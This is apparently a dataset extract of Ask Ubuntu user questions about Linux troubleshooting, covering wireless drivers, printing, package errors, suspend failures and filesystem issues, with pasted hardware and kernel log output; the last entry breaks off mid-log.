98146	changing hostnames in bulk	i just need to rename the hostnames of all the desktops based on their ip addresses . for example if the ip address is 172.29.72.25 hostname should be assigned as node25 , if the ip address is 172.29.72.26 hostname should be node26 etc etc . i have keybased ssh access to all these hosts . i thing this is possible via bash script , can someone help me ? thanks in advance .
98147	why can i only print in monochrome when using a sharp mx-4500n color laser printer ?	in my company we have a sharp mx-4500n , but i only can print in monochrome , even if all the options are defined to print in colour . i 've tried several ppd ( original from distribution , sharp , openprinting ) and applications , sending jobs directly or by print server ( smb ) and always have the same problem . capturing the file sent to the printer , i can see the document is in colour , but probably the information to print in colour is not sent to printer . in the printer server there is authentication to print in colour , but directly there is no authentication . from a windows machine i 've print in colour directly by lpr . the default in the printer is to do black and white , switching to the default to colour i could print in colour from ubuntu . probably the print job is not sending the parameters correctly . how can i debug that ? can you point more ways to troubleshoot this problem ? the server is running ubuntu 11.10 .
98150	qt4-x11 4.4.7.0 in lucid	can this version of qt4 be successfully be installed on lucid . so many things i try to install depend on this . error : dependency is not satisfiable : libqtcore4 ( > = 4:4.7.0~beta1 ) calibre ppa-lucid is showing 4:4.7.0-0ubuntu4~ppa2 , but notes : package build failures ( status ) : -calibre : it 's a problem with qt4 , i think , i 'm trying a build on my main ppa . which , if successful , will be copied to this repo . i 've also seen backports available for kubuntu of beta1 and beta2 but i 'm running xubuntu and i really do n't understand backports anyway . change log version : *deleted* 2011-07-24 05:30:54 utc no changelog for deleted or moved packages . version : 4:4.7.0~beta2-0ubuntu1~lucid1~ppa1 2010-07-11 12:26:25 utc qt4-x11 ( 4:4.7.0~beta2-0ubuntu1~lucid1~ppa1 ) lucid ; urgency=low . * lucid backport source diff to previous version version : 4:4.7.0~beta1+git20100522-0ubuntu1~lucid1~ppa1 2010-06-10 00:24:09 utc qt4-x11 ( 4:4.7.0~beta1+git20100522-0ubuntu1~lucid1~ppa1 ) lucid ; urgency=low . * lucid backport is this a lost cause ?
98151	how to enable/activate openchrome driver ?	i have installed ubuntu 10.10 on a pc at my work , but my graphics do n't work . some examples : my mouse is a block with some pixels , my taskbars are completely white and i see no text and no pictures . even when i open the terminal by using the short cut ctrl+alt+t i see a with window . i have installed the openchrome drivers but i do n't know how to enable/activate them . or is there an other solution . i use the standard ubuntu shell . the specs of the computer are : motherboard : asus m2v-mx ( chipset : via k8m890 + 8237a ) cpu : amd sempron 3400+ ram : kingston 512mb ddr2 hdd : hitachi 80gb sata drive i hope that someone can help my . yours sincerely , youri de groot
98155	where should i put programs that i download so they 're available to all users ?	is there a convention that says where i should put programs i download if i want to make them available to all users ? blender , for example , appears to have a compiled executable , but also other directories and files that it ( presumably ) depends on . the answer to to which directory should i install a program from a bash script ? recommended /opt , but it is n't in my $ path by default , and my /opt happens to be empty despite installing a lot of stuff from ubuntu software center .
98156	installing mandriva rosa rocket launcher in ubuntu kde	i have a desktop computer in which i have installed the mandriva 2011 , it has a new application menu launcher like unity , and is called rosa rocket launcher . i feel that this a better application launcher than the default kde launcher . my question is , is there anyway to install it in ubuntu ?
98157	getting error message package operation failed	while installing any softwere or update i am getting this error installarchives ( ) failed : dpkg : error : parsing file '/var/lib/dpkg/available ' near line 0 : field name `/usr/share/gnome/help-langpack/gedit/sl/gedit-plugins-modelines.page ' must be followed by colon
98161	installation stuck at `` retrieving file 43 of 93 ''	im trying to install 11.10 from a usb drive . the installation process starts like it should but it gets to where it reads `` retrieving file 43 of 93 '' and it stays there . it 's been there for over 15 minutes now with no change . tried loading form cd with same issue .
98164	how to reformat/reindent all the source files in a given directory ?	given a directory containing a source tree , is there a simple way from command-line to replace each source file with its beautifully reformatted equivalent ? keep in mind that usually a source tree for a project also contains files which are not source , and the sources themselves could be in different languages . i 'm looking for some tool that supports as many languages as possible , because a project usually contains sources in many different languages . in particular , i 'd be looking for something supporting xml/html , javascript , ruby , and java .
98168	i ca n't enable an intel 5100agn wireless card	i previously installed ubuntu 10.04 on my laptop . that version installed wireless driver automatically and it worked well . but now i have installed ubuntu 11.10 and can n't enable it 's wireless . my laptop has a physical `` wireless device switch '' that for enabling its wireless , it has to switched on . when i run `` system settings '' > > `` additional drivers '' it announces `` no proprietary drivers are in use on this system '' my laptop is lenovo ideapad u330 and below is some information about my laptop network specs : > > sudo lshw -class network *-network description : ethernet interface product : netlink bcm5906m fast ethernet pci express vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:01:00.0 logical name : eth0 version : 02 serial : 00:1f:16:20 : ef:14 size : 100mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm vpd msi pciexpress bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=tg3 driverversion=3.119 duplex=full firmware=sb v3.04 ip=192.168.1.100 latency=0 link=yes multicast=yes port=twisted pair speed=100mbit/s resources : irq:47 memory:95600000-9560ffff *-network disabled description : wireless interface product : pro/wireless 5100 agn [ shiloh ] network connection vendor : intel corporation physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : 00 serial : 00:1e:65 : f7:51:0a width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlagn driverversion=3.0.0-15-generic firmware=8.83.5.1 build 33692 latency=0 link=no multicast=yes wireless=ieee 802.11abgn resources : irq:45 memory:94600000-94601fff > > rfkill list all 0 : ideapad_wlan : wireless lan soft blocked : yes hard blocked : no 1 : ideapad_bluetooth : bluetooth soft blocked : no hard blocked : no 2 : phy0 : wireless lan soft blocked : yes hard blocked : yes 3 : hci0 : bluetooth soft blocked : no hard blocked : no after applying iwlagn changes , although my laptop 's `` physical wireless switch '' is on and i press fn+f5 key combination , network manager can not detect it and announces that wireless is disabled by hardware switch . i use ubuntu 11.10 as sole os on my laptop .
98180	nautilus ca n't see files on a ntfs partitions , but 'ls ' command shows them ?	this is a weird one . nautilus suddenly stopped showing any files in the desktop folder of my windows 7 partition . it correctly shows files in all other folders . what 's even stranger is that if i do cd /windows/users/myuser/desktop ls -l from the terminal , all the files show , no problem . update just noticed this part of the output of ls , i think this is the culprit : drwxrwx -- - 1 root plugdev 4096 2012-01-04 00:26 mydirectory1 d ? ? ? ? ? ? ? ? ? ? ? ? ? ? mydirectory2 i had copied 'mydirectory2 ' from my linux partition to windows while running ubuntu . i know linux ntfs support is not as good as the native windows support , so may be something went wrong . i ca n't delete this file . trying to delete it ( with 'rm -r mydirectory2 ' ) gives : rm : can not remove `mydirectory2 ' : input/output error
98181	how to get screen size through python curses	i 'm writing a terminal program and need to get the size of the tty i 'm using . the internet seems to suggest this can be done with curses , but i ca n't seem to find out how in python . i 'm trying to avoid using the rows and columns environment variables if possible : )
98184	increase screen idle dim timeout	on ubuntu 11.10 , when on battery , the screen dims after 10 seconds of inactivity . this is annoying because it is too short . is there anyway to increase this timeout ? i know i can disable it , but that is not what i want .
98187	is there a recommended default iptables setup ?	i 've been using ubuntu server for a while , however i have never really invested time into iptables . i was wondering if there was a recommended way to setup iptables on a basic server intall . an iptables boilerplate essentially . also , an explanation of all of the most commonly used ubuntu server ports would be very helpful .
98190	can i snap windows by using super key ?	can i snap windows to the left , right , maximize by doing super+arrowleft , super+arrowright , super+arrowup ? this is a feature in windows 7 and is really useful . wondering if there 's a possibility to to this in unity . thanks in advance : - )
98194	installation problems on windows7	on a brand new dell xps 64 bit laptop with windows home premium pre-installed i have installed ubuntu 11.10 . i have down loaded the image from ubuntu.com and burned that on a cd . using this cd i have installed it on my machine . i have chosen the dual boot option every thing went on well and got an option for restart . while restarting it has directly gone to windows . i could not see the disk partition of ubuntu on windows . then i tried to boot from the cd , one line iso linex .. appeared on the screen and the system hanged up , tried several times but the result is same can some body help me to overcome this problem ? thanks in advance
98201	what 's the `` right way '' to restart services in 11.10 ?	i have a stack of things i used to do when my wireless was spazzing out ( which it seems to do from time to time ) , including running sudo /etc/init.d/networking restart but lately i 'm getting this when i run it : *running /etc/init.d/networking restart is deprecated because it may not enable again some interfaces` so ... what am i supposed to do instead ?
98202	why wo n't ubuntu copy large files to flash drives or network locations ?	since i installed 11.10 i am unable to copy large files ( say 1gb or more ) to any usb drive that is formated as fat . the file starts copying , but soon an error appears , saying '' unable to copy '' . `` error splicing file : input/output error '' . i am able to do it via terminal , using the cp command . i use gnome3 , but the same error has happened in unity as well . apparently it works if i format the usb drive as ntfs or ext3 , ext4 . but , for many appliances , fat is necessary . the problem is also not with the usb port , because it works under windows . it did not happen before , when i had 10.04 installed .
98204	problem with gnome3 on ubuntu	i recently installed the gnome3 on my ubuntu some 1-2 months ago , it was working nice , but today , i was trying a theme , and then after reverting , the gnome-shell is not working ! , when i select gnome , it runs the ubuntu-2d or something mixed , there are no animations , but it is not ubuntu-2d , whatever it is ... is no gnome ! reinstalled gnome-shell , gnome-core , gnome-session ! now the `` gnome '' is not installing , it says that i do not have gnome-core installed , or when clicked `` install '' , it does nothing , but within half a second , switches between installing.. and then back to `` free '' . what should i do ?
98210	how can i add a `` universal '' grub ?	i have ubuntu in a windows pc . recently i added android to the computer and it does install another grub . the problem is : the android-x86 grub , do n't show-me ubuntu , and the ubuntu grub do n't show-me android-x86 . what i can do ?
98211	switching the hardware wireless switch on makes dell vostro 1500 freeze	i did a fresh install of ubuntu 11.10 on my dell vostro 1500 . i found out i need to have the hardware wireless switch off in order to boot , otherwise it will hang midway during the booting process . once logged in , if i turn the hardware switch on , network-manager will change to `` device is not ready '' ( in the wireless section ) , and ubuntu will freeze after i press a few keys on my keyboard . as you can see , i have 2 network cards . the bcm4401-b0 ( wired ) works , but the intel wireless 3945 abg is giving me a hard time . $ lspci -nnk | grep -ia2 net 03:00.0 ethernet controller [ 0200 ] : broadcom corporation bcm4401-b0 100base-tx [ 14e4:170c ] ( rev 02 ) subsystem : dell device [ 1028:0228 ] kernel driver in use : b44 -- 0c:00.0 network controller [ 0280 ] : intel corporation pro/wireless 3945abg [ golan ] network connection [ 8086:4222 ] ( rev 02 ) subsystem : intel corporation device [ 8086:1020 ] kernel driver in use : iwl3945 here is some hardware info ( before switching the hardware switch on ) : $ sudo lshw -c network *-network disabled description : wireless interface product : pro/wireless 3945abg [ golan ] network connection vendor : intel corporation physical id : 0 bus info : pci @ 0000:0c:00.0 logical name : wlan0 version : 02 serial : 00:1c : bf:8b:55 : a5 width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwl3945 driverversion=3.0.0-15-generic firmware=n/a latency=0 link=no multicast=yes wireless=ieee 802.11abg resources : irq:44 memory : f9fff000-f9ffffff *-network description : ethernet interface product : bcm4401-b0 100base-tx vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:03:00.0 logical name : eth0 version : 02 serial : 00:1d:09 : b6:1a : de size : 100mbit/s capacity : 100mbit/s width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list ethernet physical mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=b44 driverversion=2.0 duplex=full ip=192.168.0.106 latency=64 link=yes multicast=yes port=twisted pair speed=100mbit/s resources : irq:17 memory : f9bfe000-f9bfffff and here are the modules loaded : $ lsmod | grep -i iwl iwl3945 83430 0 iwl_legacy 83487 1 iwl3945 mac80211 462092 2 iwl3945 , iwl_legacy cfg80211 199630 3 iwl3945 , iwl_legacy , mac80211 $ lsmod | grep -i b4 b44 36315 0 ssb 52752 1 b44 in order to diagnose , i did a less /var/log/syslog and hit shift-f to see the stuff coming in in real time . here is what i see right after switching the hardware switch on ( i tried it a couple of times , so i am sure all this is triggered by me switching the hardware wireless switch on ) : [ kernel ] kbd_keycode : 30 callbacks suppressed [ kernel ] keyboard : ca n't emulate rawmode for keycode 240 [ kernel ] keyboard : ca n't emulate rawmode for keycode 240 [ networkmanager [ 910 ] ] : < info > wifi now enabled by radio killswitch [ networkmanager [ 910 ] ] : < info > ( wlan0 ) : bringing up device [ kernel ] iwl3945 0000:0c:00.0 : loaded firmware version 15.32.2.9 [ kernel ] iwl3945 0000:0c:00.0 : wait for start_alive timeout after 2000ms any help will be appreciated .
98217	ubuntu software center says `` ubuntu software center is not communicating ''	when i open the ubuntu software center , it shows nothing and when i close the tab appears a message `` ubuntu software center is not communicating '' how can i resolve this issue ?
98218	screen freeze after waking up	ubuntu 11.10 64 bit on dell optiplex . i 'm using synergy but i 'm not sure the problem is related to it . the screen freezes after coming back from screen saver . ( it 's not suspend because my power setting is do n't suspend . ) the blank screen turned back to the last screen i used but no response . mouse is still moving . keyboard works as i can drop down to terminal using ctrl-alt-f1 . other services seems to be working by remotely logging in . i found a temporary solution from web . turn to the terminal using ctrl-alt-f1 . after log in , type unity -- replace & back to x windows by ctrl-alt-f7 . type password . it works back again . still i do want to know how to fix . any suggestions ?
98219	terminal error file system read only ( solo lectura )	when i install a terminal application in the following error occurs cuando instalo una applicacion por terminal me ocurre el siguiente error omega @ omega-desktop : ~ $ sudo apt-get install wine [ sudo ] password for omega : sudo : ca n't open /var/lib/sudo/omega/0 : sistema de archivos de solo lectura w : no se utilizan bloqueos para el archivo de bloqueo de sólo lectura /var/lib/dpkg/lock e : se interrumpió la ejecución de dpkg , debe ejecutar manualmente «sudo dpkg -- configure -a» para corregir el problema omega @ omega-desktop : ~ $ sudo dpkg -- configure -a [ sudo ] password for omega : sudo : ca n't open /var/lib/sudo/omega/0 : sistema de archivos de solo lectura dpkg : error : no se puede acceder al área de estado de dpkg : sistema de archivos de solo lectura how do i fix this ? como lo soluciono ?
98222	uninstall ubuntu-desktop with unity , gnome etc	i 've installed ubuntu 11.10 , but i was not happy with unity , so i switched to gnome 3 ( classic ) . this was also not the best for me , so i 've tried lxde . again was not exactly , what i 'm looking for . so i 've tried xfce . now i 'm happy with this solution . i do n't need gnome , unity and lxde anymore . i 've tried to remove ubuntu-desktop . it was possible , but all applications , which are installed with ubuntu are still here . how can i remove ubuntu/gnome/unity/lxde completly ?
98223	how do i get a list of obsolete packages ?	i 'm trying to figure out a way to get a list of the packages that are no longer available in the repositories that i have enabled . this workstation has been through quite a few versions of ubuntu and has had many 3rd party repositories added and removed . i 'd like to get a list of software that i have from these removed repositories , so i can clean it up or add back the appropriate repositories .
98226	how do i find out monitor make / model ?	my friend has recently bought a second-hand vehicle with an in-car computer and it 's wired up to a touchscreen monitor on the dashboard ( very impressive ! ) . now , i 've helped him install ubuntu on it today but we ca n't establish the make and model of the connected touchscreen monitor to try and source the drivers to make the touchscreen function work . are there any linux commands to work out the make / model of an attached monitor ? i 've tried google which pointed me towards the /etc/x11 directory but have had no joy with that .
98228	attempting to suspend sometimes results in system lock	running 10.10 , and in the past suspend has worked 100 % of the time . in the past few months , suspend only works roughly half the time . when it does n't work , it results in me having to do a hard reset . i 'm not sure what 's causing this , but the relevant lines i can find from kern.log : jan 22 22:24:51 core kernel : [ 63631.678378 ] iwlagn 0000:03:00.0 : activate a non driver active station id 0 addr 20 : cf:30 : c6:3c:7d jan 22 22:24:51 core kernel : [ 63631.692215 ] wlan0 : deauthenticating from 20 : cf:30 : c6:3c:7d by local choice ( reason=3 ) jan 22 22:24:51 core kernel : [ 63631.756053 ] cfg80211 : all devices are disconnected , going to restore regulatory settings jan 22 22:24:51 core kernel : [ 63631.756061 ] cfg80211 : restoring regulatory settings jan 22 22:24:51 core kernel : [ 63631.756065 ] cfg80211 : calling crda to update world regulatory domain jan 22 22:24:51 core kernel : [ 63631.847833 ] cfg80211 : world regulatory domain updated : jan 22 22:24:51 core kernel : [ 63631.847838 ] ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) jan 22 22:24:51 core kernel : [ 63631.847843 ] ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) jan 22 22:24:51 core kernel : [ 63631.847847 ] ( 2457000 khz - 2482000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) jan 22 22:24:51 core kernel : [ 63631.847851 ] ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) jan 22 22:24:51 core kernel : [ 63631.847855 ] ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) jan 22 22:24:51 core kernel : [ 63631.847858 ] ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) jan 22 22:24:51 core kernel : [ 63632.144340 ] pm : syncing filesystems ... done . jan 22 22:24:51 core kernel : [ 63632.152803 ] pm : preparing system for mem sleep jan 22 23:20:23 core kernel : [ 63632.376195 ] freezing user space processes ... ( elapsed 0.01 seconds ) done . jan 22 23:20:23 core kernel : [ 63632.393147 ] freezing remaining freezable tasks ... ( elapsed 0.01 seconds ) done . jan 22 23:20:23 core kernel : [ 63632.408132 ] pm : entering mem sleep jan 22 23:20:23 core kernel : [ 63632.408163 ] suspending console ( s ) ( use no_console_suspend to debug ) jan 22 23:20:23 core kernel : [ 63632.408932 ] sd 2:0:0:0 : [ sda ] synchronizing scsi cache jan 22 23:20:23 core kernel : [ 63632.410910 ] sd 2:0:0:0 : [ sda ] stopping disk jan 22 23:20:23 core kernel : [ 63632.473335 ] ata_piix 0000:00:1f.1 : pci int c disabled jan 22 23:20:23 core kernel : [ 63632.473410 ] ehci_hcd 0000:00:1d.7 : pci int d disabled jan 22 23:20:23 core kernel : [ 63632.473440 ] uhci_hcd 0000:00:1d.1 : pci int b disabled jan 22 23:20:23 core kernel : [ 63632.473472 ] uhci_hcd 0000:00:1d.0 : pci int a disabled jan 22 23:20:23 core kernel : [ 63632.473480 ] acpi handle has no context ! jan 22 23:20:23 core kernel : [ 63632.473492 ] sdhci-pci 0000:05:00.2 : pci int c disabled jan 22 23:20:23 core kernel : [ 63632.473505 ] acpi handle has no context ! jan 22 23:20:23 core kernel : [ 63632.473508 ] pciehp 0000:00:1c.0 : pcie04 : pciehp_suspend entry jan 22 23:20:23 core kernel : [ 63632.473542 ] ehci_hcd 0000:00:1a.7 : pci int c disabled jan 22 23:20:23 core kernel : [ 63632.473567 ] uhci_hcd 0000:00:1a.1 : pci int b disabled jan 22 23:20:23 core kernel : [ 63632.473590 ] uhci_hcd 0000:00:1a.0 : pci int a disabled jan 22 23:20:23 core kernel : [ 63632.475181 ] e1000e 0000:00:19.0 : pme # enabled jan 22 23:20:23 core kernel : [ 63632.475192 ] e1000e 0000:00:19.0 : wake-up capability enabled by acpi jan 22 23:20:23 core kernel : [ 63632.480113 ] acpi handle has no context ! jan 22 23:20:23 core kernel : [ 63632.489092 ] pciehp 0000:00:1c.1 : pcie04 : pciehp_suspend entry jan 22 23:20:23 core kernel : [ 63632.489124 ] i915 0000:00:02.0 : power state changed by acpi to d3 jan 22 23:20:23 core kernel : [ 63632.518138 ] pm : suspend of drv : sd dev:2:0:0:0 complete after 109.211 msecs jan 22 23:20:23 core kernel : [ 63632.518159 ] pm : suspend of drv : scsi dev : target2:0:0 complete after 109.170 msecs jan 22 23:20:23 core kernel : [ 63632.518174 ] pm : suspend of drv : scsi dev : host2 complete after 109.132 msecs jan 22 23:20:23 core kernel : [ 63632.576380 ] hda intel 0000:00:1b.0 : pci int b disabled jan 22 23:20:23 core kernel : [ 63632.592037 ] pm : suspend of drv : hda intel dev:0000:00:1b.0 complete after 118.516 msecs jan 22 23:20:23 core kernel : [ 63632.592062 ] pm : suspend of drv : dev : pci0000:00 complete after 117.842 msecs jan 22 23:20:23 core kernel : [ 63632.592076 ] pm : suspend of devices complete after 183.605 msecs jan 22 23:20:23 core kernel : [ 63632.592079 ] pm : suspend devices took 0.184 seconds jan 22 23:20:23 core kernel : [ 63632.617093 ] ehci_hcd 0000:00:1d.7 : power state changed by acpi to d3 jan 22 23:20:23 core kernel : [ 63632.625086 ] uhci_hcd 0000:00:1d.0 : power state changed by acpi to d3 jan 22 23:20:23 core kernel : [ 63632.649092 ] ehci_hcd 0000:00:1a.7 : power state changed by acpi to d3 jan 22 23:20:23 core kernel : [ 63632.677076 ] uhci_hcd 0000:00:1a.1 : power state changed by acpi to d3 jan 22 23:20:23 core kernel : [ 63632.677271 ] pm : late suspend of devices complete after 85.187 msecs jan 22 23:20:23 core kernel : [ 63632.717077 ] acpi : preparing to enter system sleep state s3 jan 22 23:20:23 core kernel : [ 63632.849137 ] pm : saving platform nvs memory jan 22 23:20:23 core kernel : [ 63632.855194 ] disabling non-boot cpus ... jan 22 23:20:23 core kernel : [ 63632.960058 ] cpu 1 is now offline jan 22 23:20:23 core kernel : [ 63632.960062 ] smp alternatives : switching to up code jan 22 23:20:23 core kernel : [ 63632.967545 ] extended cmos year : 2000 jan 22 23:20:23 core kernel : [ 63632.967545 ] back to c ! jan 22 23:20:23 core kernel : [ 63632.967545 ] pm : restoring platform nvs memory jan 22 23:20:23 core kernel : [ 63632.967545 ] extended cmos year : 2000 jan 22 23:20:23 core kernel : [ 63632.967545 ] enabling non-boot cpus ... jan 22 23:20:23 core kernel : [ 63632.967545 ] smp alternatives : switching to smp code jan 22 23:20:23 core kernel : [ 63632.974615 ] booting node 0 processor 1 apic 0x1 jan 22 23:20:23 core kernel : [ 63632.967100 ] initializing cpu # 1 jan 22 23:20:23 core kernel : [ 63633.152210 ] cpu1 is up jan 22 23:20:23 core kernel : [ 63633.153832 ] acpi : waking up from system sleep state s3 jan 22 23:20:23 core kernel : [ 63633.573292 ] i915 0000:00:02.0 : restoring config space at offset 0x1 ( was 0x900007 , writing 0x900407 ) jan 22 23:20:23 core kernel : [ 63633.573331 ] pci 0000:00:02.1 : restoring config space at offset 0x1 ( was 0x900000 , writing 0x900007 ) jan 22 23:20:23 core kernel : [ 63633.573520 ] uhci_hcd 0000:00:1a.0 : restoring config space at offset 0x1 ( was 0x2800005 , writing 0x2800001 ) jan 22 23:20:23 core kernel : [ 63633.617076 ] uhci_hcd 0000:00:1a.1 : power state changed by acpi to d0 jan 22 23:20:23 core kernel : [ 63633.625085 ] uhci_hcd 0000:00:1a.1 : power state changed by acpi to d0 jan 22 23:20:23 core kernel : [ 63633.625151 ] uhci_hcd 0000:00:1a.1 : restoring config space at offset 0x1 ( was 0x2800005 , writing 0x2800001 ) jan 22 23:20:23 core kernel : [ 63633.633084 ] uhci_hcd 0000:00:1a.1 : power state changed by acpi to d0 jan 22 23:20:23 core kernel : [ 63633.641084 ] uhci_hcd 0000:00:1a.1 : power state changed by acpi to d0 jan 22 23:20:23 core kernel : [ 63633.641170 ] ehci_hcd 0000:00:1a.7 : restoring config space at offset 0x1 ( was 0x2900106 , writing 0x2900102 ) jan 22 23:20:23 core kernel : [ 63633.649084 ] ehci_hcd 0000:00:1a.7 : power state changed by acpi to d0 jan 22 23:20:23 core kernel : [ 63633.657084 ] ehci_hcd 0000:00:1a.7 : power state changed by acpi to d0 jan 22 23:20:23 core kernel : [ 63633.657194 ] hda intel 0000:00:1b.0 : restoring config space at offset 0x1 ( was 0x100106 , writing 0x100102 ) jan 22 23:20:23 core kernel : [ 63633.657332 ] pcieport 0000:00:1c.0 : restoring config space at offset 0x1 ( was 0x100107 , writing 0x100507 ) jan 22 23:20:23 core kernel : [ 63633.657513 ] pcieport 0000:00:1c.1 : restoring config space at offset 0x1 ( was 0x100107 , writing 0x100507 ) jan 22 23:20:23 core kernel : [ 63633.665085 ] uhci_hcd 0000:00:1d.0 : power state changed by acpi to d0 jan 22 23:20:23 core kernel : [ 63633.673086 ] uhci_hcd 0000:00:1d.0 : power state changed by acpi to d0 jan 22 23:20:23 core kernel : [ 63633.673147 ] uhci_hcd 0000:00:1d.0 : restoring config space at offset 0x1 ( was 0x2800005 , writing 0x2800001 ) jan 22 23:20:23 core kernel : [ 63633.681084 ] uhci_hcd 0000:00:1d.0 : power state changed by acpi to d0 jan 22 23:20:23 core kernel : [ 63633.689084 ] uhci_hcd 0000:00:1d.0 : power state changed by acpi to d0 jan 22 23:20:23 core kernel : [ 63633.689152 ] uhci_hcd 0000:00:1d.1 : restoring config space at offset 0x1 ( was 0x2800005 , writing 0x2800001 ) jan 22 23:20:23 core kernel : [ 63633.689252 ] ehci_hcd 0000:00:1d.7 : restoring config space at offset 0x1 ( was 0x2900106 , writing 0x2900102 ) jan 22 23:20:23 core kernel : [ 63633.697084 ] ehci_hcd 0000:00:1d.7 : power state changed by acpi to d0 jan 22 23:20:23 core kernel : [ 63633.705084 ] ehci_hcd 0000:00:1d.7 : power state changed by acpi to d0 jan 22 23:20:23 core kernel : [ 63633.705164 ] pci 0000:00:1e.0 : restoring config space at offset 0x1 ( was 0x100005 , writing 0x100007 ) jan 22 23:20:23 core kernel : [ 63633.705454 ] ahci 0000:00:1f.2 : restoring config space at offset 0x1 ( was 0x2b00007 , writing 0x2b00407 ) jan 22 23:20:23 core kernel : [ 63633.705789 ] iwlagn 0000:03:00.0 : restoring config space at offset 0x1 ( was 0x100106 , writing 0x100506 ) jan 22 23:20:23 core kernel : [ 63633.720043 ] firewire_ohci 0000:05:00.1 : bar 0 : set to [ mem 0xd7efe800-0xd7efefff ] ( pci address [ 0xd7efe800-0xd7efefff ] jan 22 23:20:23 core kernel : [ 63633.720114 ] firewire_ohci 0000:05:00.1 : restoring config space at offset 0x3 ( was 0x800000 , writing 0x802000 ) jan 22 23:20:23 core kernel : [ 63633.720128 ] firewire_ohci 0000:05:00.1 : restoring config space at offset 0x1 ( was 0x2100000 , writing 0x2100006 ) jan 22 23:20:23 core kernel : [ 63633.736041 ] sdhci-pci 0000:05:00.2 : bar 0 : set to [ mem 0xd7efe400-0xd7efe4ff ] ( pci address [ 0xd7efe400-0xd7efe4ff ] jan 22 23:20:23 core kernel : [ 63633.736108 ] sdhci-pci 0000:05:00.2 : restoring config space at offset 0x3 ( was 0x800000 , writing 0x804000 ) jan 22 23:20:23 core kernel : [ 63633.736123 ] sdhci-pci 0000:05:00.2 : restoring config space at offset 0x1 ( was 0x2100000 , writing 0x2100006 ) jan 22 23:20:23 core kernel : [ 63633.736675 ] pm : early resume of devices complete after 163.540 msecs jan 22 23:20:23 core kernel : [ 63633.742709 ] e1000e 0000:00:19.0 : wake-up capability disabled by acpi jan 22 23:20:23 core kernel : [ 63633.742722 ] e1000e 0000:00:19.0 : pme # disabled jan 22 23:20:23 core kernel : [ 63633.742895 ] i915 0000:00:02.0 : power state changed by acpi to d0 jan 22 23:20:23 core kernel : [ 63633.742987 ] uhci_hcd 0000:00:1a.0 : pci int a - > gsi 20 ( level , low ) - > irq 20 jan 22 23:20:23 core kernel : [ 63633.743014 ] uhci_hcd 0000:00:1a.0 : setting latency timer to 64 jan 22 23:20:23 core kernel : [ 63633.743063 ] usb usb3 : root hub lost power or was reset jan 22 23:20:23 core kernel : [ 63633.743101 ] e1000e 0000:00:19.0 : irq 42 for msi/msi-x jan 22 23:20:23 core kernel : [ 63633.743188 ] i915 0000:00:02.0 : power state changed by acpi to d0 jan 22 23:20:23 core kernel : [ 63633.743195 ] i915 0000:00:02.0 : setting latency timer to 64 jan 22 23:20:23 core kernel : [ 63633.743490 ] uhci_hcd 0000:00:1a.1 : power state changed by acpi to d0 jan 22 23:20:23 core kernel : [ 63633.743743 ] uhci_hcd 0000:00:1a.1 : power state changed by acpi to d0 jan 22 23:20:23 core kernel : [ 63633.743752 ] uhci_hcd 0000:00:1a.1 : pci int b - > gsi 21 ( level , low ) - > irq 21 jan 22 23:20:23 core kernel : [ 63633.743766 ] uhci_hcd 0000:00:1a.1 : setting latency timer to 64 jan 22 23:20:23 core kernel : [ 63633.743802 ] usb usb4 : root hub lost power or was reset jan 22 23:20:23 core kernel : [ 63633.744019 ] ehci_hcd 0000:00:1a.7 : power state changed by acpi to d0 jan 22 23:20:23 core kernel : [ 63633.744289 ] ehci_hcd 0000:00:1a.7 : power state changed by acpi to d0 jan 22 23:20:23 core kernel : [ 63633.744302 ] ehci_hcd 0000:00:1a.7 : pci int c - > gsi 22 ( level , low ) - > irq 22 jan 22 23:20:23 core kernel : [ 63633.744316 ] ehci_hcd 0000:00:1a.7 : setting latency timer to 64 jan 22 23:20:23 core kernel : [ 63633.744370 ] hda intel 0000:00:1b.0 : pci int b - > gsi 17 ( level , low ) - > irq 17 jan 22 23:20:23 core kernel : [ 63633.744384 ] hda intel 0000:00:1b.0 : setting latency timer to 64 jan 22 23:20:23 core kernel : [ 63633.744485 ] hda intel 0000:00:1b.0 : irq 46 for msi/msi-x jan 22 23:20:23 core kernel : [ 63633.744551 ] pciehp 0000:00:1c.0 : pcie04 : pciehp_resume entry jan 22 23:20:23 core kernel : [ 63633.744562 ] pciehp 0000:00:1c.1 : pcie04 : pciehp_resume entry jan 22 23:20:23 core kernel : [ 63633.744820 ] uhci_hcd 0000:00:1d.0 : power state changed by acpi to d0 jan 22 23:20:23 core kernel : [ 63633.745026 ] uhci_hcd 0000:00:1d.0 : power state changed by acpi to d0 jan 22 23:20:23 core kernel : [ 63633.745035 ] uhci_hcd 0000:00:1d.0 : pci int a - > gsi 16 ( level , low ) - > irq 16 jan 22 23:20:23 core kernel : [ 63633.745050 ] uhci_hcd 0000:00:1d.0 : setting latency timer to 64 jan 22 23:20:23 core kernel : [ 63633.745086 ] usb usb5 : root hub lost power or was reset jan 22 23:20:23 core kernel : [ 63633.745122 ] uhci_hcd 0000:00:1d.1 : pci int b - > gsi 17 ( level , low ) - > irq 17 jan 22 23:20:23 core kernel : [ 63633.745137 ] uhci_hcd 0000:00:1d.1 : setting latency timer to 64 jan 22 23:20:23 core kernel : [ 63633.745172 ] usb usb6 : root hub lost power or was reset jan 22 23:20:23 core kernel : [ 63633.745271 ] pci 0000:00:1e.0 : setting latency timer to 64 jan 22 23:20:23 core kernel : [ 63633.745323 ] ata_piix 0000:00:1f.1 : pci int c - > gsi 16 ( level , low ) - > irq 16 jan 22 23:20:23 core kernel 